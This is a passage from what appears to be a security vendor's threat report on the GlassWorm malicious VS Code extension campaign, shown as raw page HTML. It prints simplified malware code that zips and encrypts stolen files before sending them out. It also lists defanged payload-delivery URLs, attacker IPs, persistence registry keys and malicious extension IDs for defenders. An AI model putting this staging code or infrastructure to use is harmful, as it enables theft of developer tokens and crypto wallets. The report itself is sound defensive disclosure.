7Z\" stroke-width=\"2\" stroke=\"currentColor\" stroke-linecap=\"round\" stroke-linejoin=\"round\"><\/path>\n                        <path d=\"M3 15C1.9 15 1 14.1 1 13V3C1 1.9 1.9 1 3 1H13C14.1 1 15 1.9 15 3\" stroke=\"currentColor\" stroke-width=\"2\" stroke-linecap=\"round\" stroke-linejoin=\"round\"><\/path>\n                    <\/svg>\n                <\/button>\n\n                <!-- Download Button -->\n                <button class=\"section-gutenberg-code-highlight__btn section-gutenberg-code-highlight__btn-download\" aria-label=\"Download code as file\" title=\"Download\">\n                    <svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" width=\"22\" height=\"22\" viewbox=\"0 0 22 22\" fill=\"none\">\n                        <path d=\"M11 14.3333V1\" stroke=\"currentColor\" stroke-width=\"2\" stroke-linecap=\"round\" stroke-linejoin=\"round\"><\/path>\n                        <path d=\"M21 14.3335V18.7779C21 19.3673 20.7659 19.9325 20.3491 20.3493C19.9324 20.766 19.3671 21.0002 18.7778 21.0002H3.22222C2.63285 21.0002 2.06762 20.766 1.65087 20.3493C1.23413 19.9325 1 19.3673 1 18.7779V14.3335\" stroke=\"currentColor\" stroke-width=\"2\" stroke-linecap=\"round\" stroke-linejoin=\"round\"><\/path>\n                        <path d=\"M5.44434 8.77783L10.9999 14.3334L16.5554 8.77783\" stroke=\"currentColor\" stroke-width=\"2\" stroke-linecap=\"round\" stroke-linejoin=\"round\"><\/path>\n                    <\/svg>\n                <\/button>\n\n                <!-- Theme Toggle Button -->\n                <button class=\"section-gutenberg-code-highlight__btn section-gutenberg-code-highlight__btn-theme\" aria-label=\"Toggle theme\" title=\"Toggle Theme\">\n                    <svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" width=\"22\" height=\"22\" viewbox=\"0 0 22 22\" fill=\"none\" class=\"section-gutenberg-code-highlight__icon-dark\">\n                        <path d=\"M11 15C13.2091 15 15 13.2091 15 11C15 8.79086 13.2091 7 11 7C8.79086 7 7 8.79086 7 11C7 13.2091 8.79086 15 11 15Z\" stroke=\"currentColor\" stroke-width=\"2\" stroke-linecap=\"round\" stroke-linejoin=\"round\"><\/path>\n                        <path d=\"M11 1V3\" stroke=\"currentColor\" stroke-width=\"2\" stroke-linecap=\"round\" stroke-linejoin=\"round\"><\/path>\n                        <path d=\"M11 19V21\" stroke=\"currentColor\" stroke-width=\"2\" stroke-linecap=\"round\" stroke-linejoin=\"round\"><\/path>\n                        <path d=\"M3.92993 3.93018L5.33993 5.34018\" stroke=\"currentColor\" stroke-width=\"2\" stroke-linecap=\"round\" stroke-linejoin=\"round\"><\/path>\n                        <path d=\"M16.6599 16.6602L18.0699 18.0702\" stroke=\"currentColor\" stroke-width=\"2\" stroke-linecap=\"round\" stroke-linejoin=\"round\"><\/path>\n                        <path d=\"M1 11H3\" stroke=\"currentColor\" stroke-width=\"2\" stroke-linecap=\"round\" stroke-linejoin=\"round\"><\/path>\n                        <path d=\"M19 11H21\" stroke=\"currentColor\" stroke-width=\"2\" stroke-linecap=\"round\" stroke-linejoin=\"round\"><\/path>\n                        <path d=\"M5.33993 16.6602L3.92993 18.0702\" stroke=\"currentColor\" stroke-width=\"2\" stroke-linecap=\"round\" stroke-linejoin=\"round\"><\/path>\n                        <path d=\"M18.0699 3.93018L16.6599 5.34018\" stroke=\"currentColor\" stroke-width=\"2\" stroke-linecap=\"round\" stroke-linejoin=\"round\"><\/path>\n                    <\/svg>\n\n                    <svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" width=\"22\" class=\"section-gutenberg-code-highlight__icon-light\" height=\"22\" viewbox=\"0 0 22 22\" fill=\"none\">\n                        <path d=\"M20.9992 11.5325C20.895 13.4629 20.2339 15.3218 19.0957 16.8844C17.9576 18.4471 16.3912 19.6466 14.5859 20.3381C12.7806 21.0295 10.8137 21.1832 8.92287 20.7806C7.03207 20.378 5.29836 19.4363 3.93132 18.0694C2.56428 16.7025 1.62243 14.9689 1.21963 13.0781C0.816833 11.1874 0.970326 9.22041 1.66156 7.41502C2.35279 5.60964 3.55217 4.04311 5.1147 2.90483C6.67724 1.76654 8.53604 1.10522 10.4664 1.00081C10.9167 0.976347 11.1524 1.51227 10.9134 1.89365C10.1138 3.17292 9.77145 4.68543 9.94215 6.18433C10.1129 7.68323 10.7865 9.08002 11.8533 10.1468C12.92 11.2135 14.3168 11.8872 15.8157 12.0579C17.3146 12.2286 18.8271 11.8862 20.1064 11.0866C20.4888 10.8476 21.0237 11.0822 20.9992 11.5325Z\" stroke=\"currentColor\" stroke-width=\"2\" stroke-linecap=\"round\" stroke-linejoin=\"round\"><\/path>\n                    <\/svg>\n                <\/button>\n\n                <!-- Open External Button -->\n                <button class=\"section-gutenberg-code-highlight__btn section-gutenberg-code-highlight__btn-external\" aria-label=\"Open in new window\" title=\"Open External\">\n                    <svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" width=\"21\" height=\"21\" viewbox=\"0 0 21 21\" fill=\"none\">\n                        <path d=\"M13.6665 1H19.9998V7.33333\" stroke=\"currentColor\" stroke-width=\"2\" stroke-linecap=\"round\" stroke-linejoin=\"round\"><\/path>\n                        <path d=\"M8.38892 12.6111L20 1\" stroke=\"currentColor\" stroke-width=\"2\" stroke-linecap=\"round\" stroke-linejoin=\"round\"><\/path>\n                        <path d=\"M16.8333 11.5559V17.8892C16.8333 18.4491 16.6109 18.9861 16.215 19.382C15.8191 19.7779 15.2821 20.0003 14.7222 20.0003H3.11111C2.55121 20.0003 2.01424 19.7779 1.61833 19.382C1.22242 18.9861 1 18.4491 1 17.8892V6.2781C1 5.7182 1.22242 5.18123 1.61833 4.78532C2.01424 4.38941 2.55121 4.16699 3.11111 4.16699H9.44444\" stroke=\"currentColor\" stroke-width=\"2\" stroke-linecap=\"round\" stroke-linejoin=\"round\"><\/path>\n                    <\/svg>\n                <\/button>\n            <\/div>\n            <div class=\"section-gutenberg-code-highlight__toolbar-right\">\n                <!-- Language Selector -->\n                <div class=\"section-gutenberg-code-highlight__language-selector\">\n                    <label for=\"language-select-block_00fab2d0a149331c8e05123a475391ac\" class=\"section-gutenberg-code-highlight__language-label\">Language:<\/label>\n                    <select id=\"language-select-block_00fab2d0a149331c8e05123a475391ac\" class=\"section-gutenberg-code-highlight__language-dropdown\" aria-label=\"Select code language\">\n                        <option value=\"auto\">Auto-detect<\/option>\n                        <option value=\"plaintext\">Plain Text<\/option>\n                        <option value=\"bash\">Bash<\/option>\n                        <option value=\"css\">CSS<\/option>\n                        <option value=\"dockerfile\">Dockerfile<\/option>\n                        <option value=\"go\">Go<\/option>\n                        <option value=\"html\">HTML<\/option>\n                        <option value=\"java\">Java<\/option>\n                        <option value=\"javascript\" selected>JavaScript<\/option>\n                        <option value=\"json\">JSON<\/option>\n                        <option value=\"kotlin\">Kotlin<\/option>\n                        <option value=\"markdown\">Markdown<\/option>\n                        <option value=\"php\">PHP<\/option>\n                        <option value=\"python\">Python<\/option>\n                        <option value=\"ruby\">Ruby<\/option>\n                        <option value=\"rust\">Rust<\/option>\n                        <option value=\"sql\">SQL<\/option>\n                        <option value=\"swift\">Swift<\/option>\n                        <option value=\"typescript\">TypeScript<\/option>\n                        <option value=\"xml\">XML<\/option>\n                        <option value=\"yaml\">YAML<\/option>\n                    <\/select>\n                <\/div>\n            <\/div>\n        <\/div>\n\n        <!-- Code Container -->\n        <div class=\"section-gutenberg-code-highlight__container\">\n            <!-- Line Numbers (generated by JS) -->\n            <div class=\"section-gutenberg-code-highlight__line-numbers\" aria-hidden=\"true\">\n                <!-- Line numbers will be generated dynamically by JavaScript -->\n            <\/div>\n\n            <!-- Code Block -->\n            <pre class=\"section-gutenberg-code-highlight__pre\"><code class=\"section-gutenberg-code-highlight__code language-javascript\">\/\/ bundled modules observed in the recovered stage:\r\n\/\/ - k-rpc-socket\r\n\/\/ - bittorrent-dht\r\n\/\/ - engine.io-client\r\n\/\/ - socket.io-client\r\n\/\/ - ws\r\n\r\nbootstrap: [\r\n  &quot;dht[.]libtorrent[.]org[:]25401&quot;,\r\n  &quot;router[.]bittorrent[.]com[:]6881&quot;,\r\n  &quot;router[.]utorrent[.]com[:]6881&quot;\r\n]\r\n\r\n\/\/ Note: strings above modified by Checkmarx Zero for safety\r\n\/\/       domains and ports have been [bracketed] to avoid accidental use.<\/code><\/pre>\n        <\/div>\n        <!-- Status Message -->\n        <div class=\"section-gutenberg-code-highlight__status\" role=\"status\" aria-live=\"polite\"><\/div>\n    <\/div>\n<\/section>\n\n\n\n<p>Before transmission, the collected data is compressed into a ZIP archive and then encrypted:<\/p>\n\n\n<section class=\"section-gutenberg-code-highlight light-theme\" data-theme=\"light\" data-syntax=\"color\" data-language=\"javascript\">\n    <div class=\"section-gutenberg-code-highlight__wrapper\">\n        <!-- Toolbar -->\n        <div class=\"section-gutenberg-code-highlight__toolbar\">\n            <div class=\"section-gutenberg-code-highlight__toolbar-left\">\n                <!-- Copy Button -->\n                <button class=\"section-gutenberg-code-highlight__btn section-gutenberg-code-highlight__btn-copy\" aria-label=\"Copy code to clipboard\" title=\"Copy\">\n                    <svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" width=\"22\" height=\"22\" viewbox=\"0 0 22 22\" fill=\"none\">\n                        <path d=\"M19 7H9C7.89543 7 7 7.89543 7 9V19C7 20.1046 7.89543 21 9 21H19C20.1046 21 21 20.1046 21 19V9C21 7.89543 20.1046 7 19 7Z\" stroke-width=\"2\" stroke=\"currentColor\" stroke-linecap=\"round\" stroke-linejoin=\"round\"><\/path>\n                        <path d=\"M3 15C1.9 15 1 14.1 1 13V3C1 1.9 1.9 1 3 1H13C14.1 1 15 1.9 15 3\" stroke=\"currentColor\" stroke-width=\"2\" stroke-linecap=\"round\" stroke-linejoin=\"round\"><\/path>\n                    <\/svg>\n                <\/button>\n\n                <!-- Download Button -->\n                <button class=\"section-gutenberg-code-highlight__btn section-gutenberg-code-highlight__btn-download\" aria-label=\"Download code as file\" title=\"Download\">\n                    <svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" width=\"22\" height=\"22\" viewbox=\"0 0 22 22\" fill=\"none\">\n                        <path d=\"M11 14.3333V1\" stroke=\"currentColor\" stroke-width=\"2\" stroke-linecap=\"round\" stroke-linejoin=\"round\"><\/path>\n                        <path d=\"M21 14.3335V18.7779C21 19.3673 20.7659 19.9325 20.3491 20.3493C19.9324 20.766 19.3671 21.0002 18.7778 21.0002H3.22222C2.63285 21.0002 2.06762 20.766 1.65087 20.3493C1.23413 19.9325 1 19.3673 1 18.7779V14.3335\" stroke=\"currentColor\" stroke-width=\"2\" stroke-linecap=\"round\" stroke-linejoin=\"round\"><\/path>\n                        <path d=\"M5.44434 8.77783L10.9999 14.3334L16.5554 8.77783\" stroke=\"currentColor\" stroke-width=\"2\" stroke-linecap=\"round\" stroke-linejoin=\"round\"><\/path>\n                    <\/svg>\n                <\/button>\n\n                <!-- Theme Toggle Button -->\n                <button class=\"section-gutenberg-code-highlight__btn section-gutenberg-code-highlight__btn-theme\" aria-label=\"Toggle theme\" title=\"Toggle Theme\">\n                    <svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" width=\"22\" height=\"22\" viewbox=\"0 0 22 22\" fill=\"none\" class=\"section-gutenberg-code-highlight__icon-dark\">\n                        <path d=\"M11 15C13.2091 15 15 13.2091 15 11C15 8.79086 13.2091 7 11 7C8.79086 7 7 8.79086 7 11C7 13.2091 8.79086 15 11 15Z\" stroke=\"currentColor\" stroke-width=\"2\" stroke-linecap=\"round\" stroke-linejoin=\"round\"><\/path>\n                        <path d=\"M11 1V3\" stroke=\"currentColor\" stroke-width=\"2\" stroke-linecap=\"round\" stroke-linejoin=\"round\"><\/path>\n                        <path d=\"M11 19V21\" stroke=\"currentColor\" stroke-width=\"2\" stroke-linecap=\"round\" stroke-linejoin=\"round\"><\/path>\n                        <path d=\"M3.92993 3.93018L5.33993 5.34018\" stroke=\"currentColor\" stroke-width=\"2\" stroke-linecap=\"round\" stroke-linejoin=\"round\"><\/path>\n                        <path d=\"M16.6599 16.6602L18.0699 18.0702\" stroke=\"currentColor\" stroke-width=\"2\" stroke-linecap=\"round\" stroke-linejoin=\"round\"><\/path>\n                        <path d=\"M1 11H3\" stroke=\"currentColor\" stroke-width=\"2\" stroke-linecap=\"round\" stroke-linejoin=\"round\"><\/path>\n                        <path d=\"M19 11H21\" stroke=\"currentColor\" stroke-width=\"2\" stroke-linecap=\"round\" stroke-linejoin=\"round\"><\/path>\n                        <path d=\"M5.33993 16.6602L3.92993 18.0702\" stroke=\"currentColor\" stroke-width=\"2\" stroke-linecap=\"round\" stroke-linejoin=\"round\"><\/path>\n                        <path d=\"M18.0699 3.93018L16.6599 5.34018\" stroke=\"currentColor\" stroke-width=\"2\" stroke-linecap=\"round\" stroke-linejoin=\"round\"><\/path>\n                    <\/svg>\n\n                    <svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" width=\"22\" class=\"section-gutenberg-code-highlight__icon-light\" height=\"22\" viewbox=\"0 0 22 22\" fill=\"none\">\n                        <path d=\"M20.9992 11.5325C20.895 13.4629 20.2339 15.3218 19.0957 16.8844C17.9576 18.4471 16.3912 19.6466 14.5859 20.3381C12.7806 21.0295 10.8137 21.1832 8.92287 20.7806C7.03207 20.378 5.29836 19.4363 3.93132 18.0694C2.56428 16.7025 1.62243 14.9689 1.21963 13.0781C0.816833 11.1874 0.970326 9.22041 1.66156 7.41502C2.35279 5.60964 3.55217 4.04311 5.1147 2.90483C6.67724 1.76654 8.53604 1.10522 10.4664 1.00081C10.9167 0.976347 11.1524 1.51227 10.9134 1.89365C10.1138 3.17292 9.77145 4.68543 9.94215 6.18433C10.1129 7.68323 10.7865 9.08002 11.8533 10.1468C12.92 11.2135 14.3168 11.8872 15.8157 12.0579C17.3146 12.2286 18.8271 11.8862 20.1064 11.0866C20.4888 10.8476 21.0237 11.0822 20.9992 11.5325Z\" stroke=\"currentColor\" stroke-width=\"2\" stroke-linecap=\"round\" stroke-linejoin=\"round\"><\/path>\n                    <\/svg>\n                <\/button>\n\n                <!-- Open External Button -->\n                <button class=\"section-gutenberg-code-highlight__btn section-gutenberg-code-highlight__btn-external\" aria-label=\"Open in new window\" title=\"Open External\">\n                    <svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" width=\"21\" height=\"21\" viewbox=\"0 0 21 21\" fill=\"none\">\n                        <path d=\"M13.6665 1H19.9998V7.33333\" stroke=\"currentColor\" stroke-width=\"2\" stroke-linecap=\"round\" stroke-linejoin=\"round\"><\/path>\n                        <path d=\"M8.38892 12.6111L20 1\" stroke=\"currentColor\" stroke-width=\"2\" stroke-linecap=\"round\" stroke-linejoin=\"round\"><\/path>\n                        <path d=\"M16.8333 11.5559V17.8892C16.8333 18.4491 16.6109 18.9861 16.215 19.382C15.8191 19.7779 15.2821 20.0003 14.7222 20.0003H3.11111C2.55121 20.0003 2.01424 19.7779 1.61833 19.382C1.22242 18.9861 1 18.4491 1 17.8892V6.2781C1 5.7182 1.22242 5.18123 1.61833 4.78532C2.01424 4.38941 2.55121 4.16699 3.11111 4.16699H9.44444\" stroke=\"currentColor\" stroke-width=\"2\" stroke-linecap=\"round\" stroke-linejoin=\"round\"><\/path>\n                    <\/svg>\n                <\/button>\n            <\/div>\n            <div class=\"section-gutenberg-code-highlight__toolbar-right\">\n                <!-- Language Selector -->\n                <div class=\"section-gutenberg-code-highlight__language-selector\">\n                    <label for=\"language-select-block_8752e938df26926dfb5247de07d232f3\" class=\"section-gutenberg-code-highlight__language-label\">Language:<\/label>\n                    <select id=\"language-select-block_8752e938df26926dfb5247de07d232f3\" class=\"section-gutenberg-code-highlight__language-dropdown\" aria-label=\"Select code language\">\n                        <option value=\"auto\">Auto-detect<\/option>\n                        <option value=\"plaintext\">Plain Text<\/option>\n                        <option value=\"bash\">Bash<\/option>\n                        <option value=\"css\">CSS<\/option>\n                        <option value=\"dockerfile\">Dockerfile<\/option>\n                        <option value=\"go\">Go<\/option>\n                        <option value=\"html\">HTML<\/option>\n                        <option value=\"java\">Java<\/option>\n                        <option value=\"javascript\" selected>JavaScript<\/option>\n                        <option value=\"json\">JSON<\/option>\n                        <option value=\"kotlin\">Kotlin<\/option>\n                        <option value=\"markdown\">Markdown<\/option>\n                        <option value=\"php\">PHP<\/option>\n                        <option value=\"python\">Python<\/option>\n                        <option value=\"ruby\">Ruby<\/option>\n                        <option value=\"rust\">Rust<\/option>\n                        <option value=\"sql\">SQL<\/option>\n                        <option value=\"swift\">Swift<\/option>\n                        <option value=\"typescript\">TypeScript<\/option>\n                        <option value=\"xml\">XML<\/option>\n                        <option value=\"yaml\">YAML<\/option>\n                    <\/select>\n                <\/div>\n            <\/div>\n        <\/div>\n\n        <!-- Code Container -->\n        <div class=\"section-gutenberg-code-highlight__container\">\n            <!-- Line Numbers (generated by JS) -->\n            <div class=\"section-gutenberg-code-highlight__line-numbers\" aria-hidden=\"true\">\n                <!-- Line numbers will be generated dynamically by JavaScript -->\n            <\/div>\n\n            <!-- Code Block -->\n            <pre class=\"section-gutenberg-code-highlight__pre\"><code class=\"section-gutenberg-code-highlight__code language-javascript\">const zip2 = new AdmZip();\r\nzip2.addLocalFolder(path.join(process.env.TEMP, &quot;AGeZdIX&quot;));\r\nconst willSendThis = zip2.toBuffer();\r\n\r\nconst key = crypto.randomBytes(32);\r\nconst iv = crypto.randomBytes(16);\r\nconst cipher = crypto.createCipheriv(&quot;aes-256-cbc&quot;, key, iv);\r\nconst encrypted = Buffer.concat([cipher.update(willSendThis), cipher.final()]);\r\n\r\n\/\/ Note: this snippet was simplified from the original for readability.<\/code><\/pre>\n        <\/div>\n        <!-- Status Message -->\n        <div class=\"section-gutenberg-code-highlight__status\" role=\"status\" aria-live=\"polite\"><\/div>\n    <\/div>\n<\/section>\n\n\n\n<h2 class=\"wp-block-heading article-anchor\" id=\"article-anchor-4\">Closing thoughts<\/h2>\n\n\n\n<p>GlassWorm stands out not because every new wave introduces an entirely new design, but because the campaign keeps adapting while preserving the same operational skeleton. Some relied on invisible Unicode tricks, others on wrapper-based obfuscation, dynamic reconstruction, or layered decoding. Yet the core behavior remained stable:<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>malicious VS Code and Open VSX extensions as the initial access point<\/li>\n\n\n\n<li>Solana memo-based stage discovery<\/li>\n\n\n\n<li>Russian locale evasion<\/li>\n\n\n\n<li>staged payload retrieval<\/li>\n\n\n\n<li>dynamic execution inside the extension runtime<\/li>\n\n\n\n<li>wallet theft, npm token theft, persistence, and exfiltration<\/li>\n<\/ul>\n\n\n\n<p>Earlier reporting highlighted GlassWorm\u2019s use of invisible Unicode characters. One of the VS Code extensions in this set still used that same concealment method while reusing a Solana address seen in previous campaign activity. At the same time, the other ones make clear that the campaign is no longer dependent on a single concealment technique. The wrapper changes, but the execution pattern remains recognizable.<\/p>\n\n\n\n<h2 class=\"wp-block-heading article-anchor\" id=\"article-anchor-5\">What should you do about GlassWorm?<\/h2>\n\n\n\n<p>Organizations and developers should add the identified IOCs to both network and endpoint defenses, including domains, IP addresses, wallet addresses, dropped filenames, scheduled task names, registry keys.<\/p>\n\n\n\n<p>They should also search for signs of these extensions and their later-stage activity across developer environments. This means looking for the reported extension identifiers in VS Code and Open VSX extension directories, suspicious files written under user profile and AppData paths, unexpected Run key entries, scheduled tasks, dropped files, and outbound connections to the recovered infrastructure.<\/p>\n\n\n\n<p>If evidence of infection is found, affected developers should rotate any credentials that may have been exposed, especially npm, GitHub, GitLab, cloud, and other publishing or developer tokens. Because the later stages also target wallets and wallet-related data, impacted users should also treat cryptocurrency wallet secrets, passphrases, and recovery material as potentially exposed and respond accordingly.<\/p>\n\n\n\n<h2 class=\"wp-block-heading article-anchor\" id=\"article-anchor-6\">GlassWorm Indicators of Compromise (IoC)<\/h2>\n\n\n\n<details><summary style=\"font-size: 120%; font-weight: bold;\">Expand for details of IoCs<\/summary><style>details li { font-family: var(--code-font);\n    font-size: 85%;\n    padding-inline: 0.5em;\n    color: var(--code-dim); }<\/style>\n\n\n\n<h3 class=\"wp-block-heading\">Network<\/h3>\n\n\n\n<ul class=\"wp-block-list\">\n<li>https[:]\/\/api[.]mainnet-beta[.]solana[.]com<\/li>\n\n\n\n<li>https[:]\/\/solana-mainnet[.]gateway[.]tatum[.]io<\/li>\n\n\n\n<li>https[:]\/\/go[.]getblock[.]us\/86aac42ad4484f3c813079afc201451c<\/li>\n\n\n\n<li>https[:]\/\/solana-rpc[.]publicnode[.]com<\/li>\n\n\n\n<li>https[:]\/\/api[.]blockeden[.]xyz\/solana\/KeCh6p22EX5AeRHxMSmc<\/li>\n\n\n\n<li>https[:]\/\/solana[.]drpc[.]org<\/li>\n\n\n\n<li>https[:]\/\/solana[.]leorpc[.]com\/?api_key=FREE<\/li>\n\n\n\n<li>https[:]\/\/solana[.]api[.]onfinality[.]io\/public<\/li>\n\n\n\n<li>https[:]\/\/solana[.]api[.]pocket[.]network\/&nbsp;<\/li>\n\n\n\n<li>https[:]\/\/public[.]rpc[.]solanavibestation[.]com<\/li>\n\n\n\n<li>https[:]\/\/sol-protect[.]rpc[.]blxrbdn[.]com<\/li>\n<\/ul>\n\n\n\n<h3 class=\"wp-block-heading\">Blockchain address<\/h3>\n\n\n\n<ul class=\"wp-block-list\">\n<li>6YGcuyFRJKZtcaYCCFba9fScNUvPkGXodXE1mJiSzqDJ<\/li>\n\n\n\n<li>BjVeAjPrSKFiingBn4vZvghsGj9KCE8AJVtbc9S8o8SC<\/li>\n<\/ul>\n\n\n\n<h3 class=\"wp-block-heading\">IP address<\/h3>\n\n\n\n<ul class=\"wp-block-list\">\n<li>45[.]32[.]150[.]251<\/li>\n\n\n\n<li>45[.]32[.]151[.]157<\/li>\n\n\n\n<li>70[.]34[.]242[.]255<\/li>\n\n\n\n<li>208[.]85[.]20[.]124<\/li>\n<\/ul>\n\n\n\n<h3 class=\"wp-block-heading\">Stage-delivery<\/h3>\n\n\n\n<ul class=\"wp-block-list\">\n<li>45[.]32[.]150[.]251\/get_arhive_npm\/wBTsMvl78kbdYOVuAeE0Fw%3D%3D<\/li>\n\n\n\n<li>45[.]32[.]150[.]251\/led-win32<\/li>\n\n\n\n<li>208[.]85[.]20[.]124:80\/wall<\/li>\n\n\n\n<li>calendar[.]app[.]google\/2NkrcKKj4T6Dn4uK6<\/li>\n<\/ul>\n\n\n\n<h3 class=\"wp-block-heading\">Artifacts<\/h3>\n\n\n\n<ul class=\"wp-block-list\">\n<li>TvVdSR.exe<\/li>\n\n\n\n<li>HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\UpdateLedger<\/li>\n\n\n\n<li>%TEMP%\\WlpSxEJPU\\<\/li>\n\n\n\n<li>gJSFJ (bundled archive path)<\/li>\n<\/ul>\n\n\n\n<h3 class=\"wp-block-heading\">Extensions<\/h3>\n\n\n\n<p><strong>Note<\/strong>: this list includes the extensions mentioned in this post, as well as others recently identified by both Checkmarx Zero and other researchers within the community, and is provided as a convenience for defenders.<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>aadarkcode.one-dark-material<\/li>\n\n\n\n<li>aligntool.extension-align-professional-tool<\/li>\n\n\n\n<li>angular-studio.ng-angular-extension<\/li>\n\n\n\n<li>awesome-codebase.codebase-dart-pro<\/li>\n\n\n\n<li>awesomeco.wonder-for-vscode-icons<\/li>\n\n\n\n<li>bhbpbarn.vsce-python-indent-extension<\/li>\n\n\n\n<li>blockstoks.easily-gitignore-manage<\/li>\n\n\n\n<li>brategmaqendaalar-studio.pro-prettyxml-formatter<\/li>\n\n\n\n<li>codbroks.compile-runnner-extension<\/li>\n\n\n\n<li>codevunmis.csv-sql-tsv-rainbow<\/li>\n\n\n\n<li>codwayexten.code-way-extension<\/li>\n\n\n\n<li>cosmic-themes.sql-formatter<\/li>\n\n\n\n<li>craz2team.vscode-todo-extension<\/li>\n\n\n\n<li>crotoapp.vscode-xml-extension<\/li>\n\n\n\n<li>cudra-production.vsce-prettier-pro<\/li>\n\n\n\n<li>daeumer-web.es-linter-for-vs-code<\/li>\n\n\n\n<li>dark-code-studio.flutter-extension<\/li>\n\n\n\n<li>densy-little-studio.wonder-for-vscode-icons<\/li>\n\n\n\n<li>dep-labs-studio.dep-proffesinal-extension<\/li>\n\n\n\n<li>dev-studio-sense.php-comp-tools-vscode<\/li>\n\n\n\n<li>devmidu-studio.svg-better-extension<\/li>\n\n\n\n<li>dopbop-studio.vscode-tailwindcss-extension-toolkit<\/li>\n\n\n\n<li>errlenscre.error-lens-finder-ex<\/li>\n\n\n\n<li>exss-studio.yaml-professional-extension<\/li>\n\n\n\n<li>federicanc.dotenv-syntax-highlighting<\/li>\n\n\n\n<li>flutxvs.vscode-kuberntes-extension<\/li>\n\n\n\n<li>gvotcha.claude-code-extension<\/li>\n\n\n\n<li>gvotcha.claude-code-extensions<\/li>\n\n\n\n<li>intellipro.extension-json-intelligence<\/li>\n\n\n\n<li>kharizma.vscode-extension-wakatime<\/li>\n\n\n\n<li>ko-zu-gun-studio.synchronization-settings-vscode<\/li>\n\n\n\n<li>kwitch-studio.auto-run-command-extension<\/li>\n\n\n\n<li>lavender-studio.theme-lavender-dreams<\/li>\n\n\n\n<li>littensy-studio.magical-icons<\/li>\n\n\n\n<li>lyu-wen-studio-web-han.better-formatter-vscode<\/li>\n\n\n\n<li>markvalid.vscode-mdvalidator-extension<\/li>\n\n\n\n<li>mecreation-studio.pyrefly-pro-extension<\/li>\n\n\n\n<li>mswincx.antigravity-cockpit<\/li>\n\n\n\n<li>mswincx.antigravity-cockpit-extension<\/li>\n\n\n\n<li>namopins.prettier-pro-vscode-extension<\/li>\n\n\n\n<li>oigotm.my-command-palette-extension<\/li>\n\n\n\n<li>otoboss.autoimport-extension<\/li>\n\n\n\n<li>ovixcode.vscode-better-comments<\/li>\n\n\n\n<li>pessa07tm.my-js-ts-auto-commands<\/li>\n\n\n\n<li>potstok.dotnet-runtime-extension<\/li>\n\n\n\n<li>pretty-studio-advisor.prettyxml-formatter<\/li>\n\n\n\n<li>prismapp.prisma-vs-code-extension<\/li>\n\n\n\n<li>projmanager.your-project-manager-extension<\/li>\n\n\n\n<li>pubruncode.ccoderunner<\/li>\n\n\n\n<li>pyflowpyr.py-flowpyright-extension<\/li>\n\n\n\n<li>pyscopexte.pyscope-extension<\/li>\n\n\n\n<li>redcapcollective.vscode-quarkus-elite-suite<\/li>\n\n\n\n<li>rubyideext.ruby-ide-extension<\/li>\n\n\n\n<li>runnerpost.runner-your-code<\/li>\n\n\n\n<li>shinypy.shiny-extension-for-vscode<\/li>\n\n\n\n<li>sol-studio.solidity-extension<\/li>\n\n\n\n<li>ssgwysc.volar-vscode<\/li>\n\n\n\n<li>studio-jjalaire-team.professional-quarto-extension<\/li>\n\n\n\n<li>studio-velte-distributor.pro-svelte-extension<\/li>\n\n\n\n<li>sun-shine-studio.shiny-extension-for-vscode<\/li>\n\n\n\n<li>sxatvo.jinja-extension<\/li>\n\n\n\n<li>tamokill12.foundry-pdf-extension<\/li>\n\n\n\n<li>thing-mn.your-flow-extension-for-icons<\/li>\n\n\n\n<li>tima-web-wang.shell-check-utils<\/li>\n\n\n\n<li>tokcodes.import-cost-extension<\/li>\n\n\n\n<li>toowespace.worksets-extension<\/li>\n\n\n\n<li>treedotree.tree-do-todoextension<\/li>\n\n\n\n<li>tucyzirille-studio.angular-pro-tools-extension<\/li>\n\n\n\n<li>turbobase.sql-turbo-tool<\/li>\n\n\n\n<li>twilkbilk.color-highlight-css<\/li>\n\n\n\n<li>vce-brendan-studio-eich.js-debuger-vscode<\/li>\n\n\n\n<li>yamaprolas.revature-labs-extension<\/li>\n\n\n\n<li>silvia68.console-log-generator<\/li>\n\n\n\n<li>quartz.quartz-markdown-editor<\/li>\n<\/ul>\n\n\n\n<\/details><p>&nbsp;<\/p>\n\n\n\n<style type=\"text\/css\">.cxzero-social{margin-top:1em;padding-top:1em;border-top:1px solid #121086;border-bottom:1px solid #121086;padding-bottom:1em}.cxzero-social p{padding-top:.8em}.cxzero-social .cxzero-social-links{margin-left:.8em}.cxzero-social .social-link{margin-left:.6em}.cxzero-social .social-button{padding:.6em;margin:.2em .2em .2em .2em;white-space:nowrap}.cxzero-social .social-button svg,.cxzero-social .social-link svg{vertical-align:middle;height:1.3em}.cxzero-social .social-button a,.cxzero-social .social-link a{text-decoration:none !important}<\/style> <div class=\"cxzero-social\">\n<p> <span class=\"social-button\"><a class=\"social-action\" href=\"https:\/\/www.linkedin.com\/sharing\/share-offsite\/?url={url}\" onload=\"\"><svg id=\"Layer_1\" data-name=\"Layer 1\" xmlns=\"http:\/\/www.w3.org\/2000\/svg\" alt=\"LinkedIn Icon\" viewbox=\"0 0 122.88 122.31\"><defs><style>.cls-1{fill:#0a66c2}.cls-1,.cls-2{fill-rule:evenodd}.cls-2{fill:#fff}<\/style><\/defs><title>linkedin-app<\/title>\n<path class=\"cls-1\" d=\"M27.75,0H95.13a27.83,27.83,0,0,1,27.75,27.75V94.57a27.83,27.83,0,0,1-27.75,27.74H27.75A27.83,27.83,0,0,1,0,94.57V27.75A27.83,27.83,0,0,1,27.75,0Z\"><\/path><path class=\"cls-2\" d=\"M49.19,47.41H64.72v8h.22c2.17-3.88,7.45-8,15.34-8,16.39,0,19.42,10.2,19.42,23.47V98.94H83.51V74c0-5.71-.12-13.06-8.42-13.06s-9.72,6.21-9.72,12.65v25.4H49.19V47.41ZM40,31.79a8.42,8.42,0,1,1-8.42-8.42A8.43,8.43,0,0,1,40,31.79ZM23.18,47.41H40V98.94H23.18V47.41Z\"><\/path><\/svg> Share on LinkedIn<\/a><\/span> <span class=\"social-button\"><a class=\"social-action\" 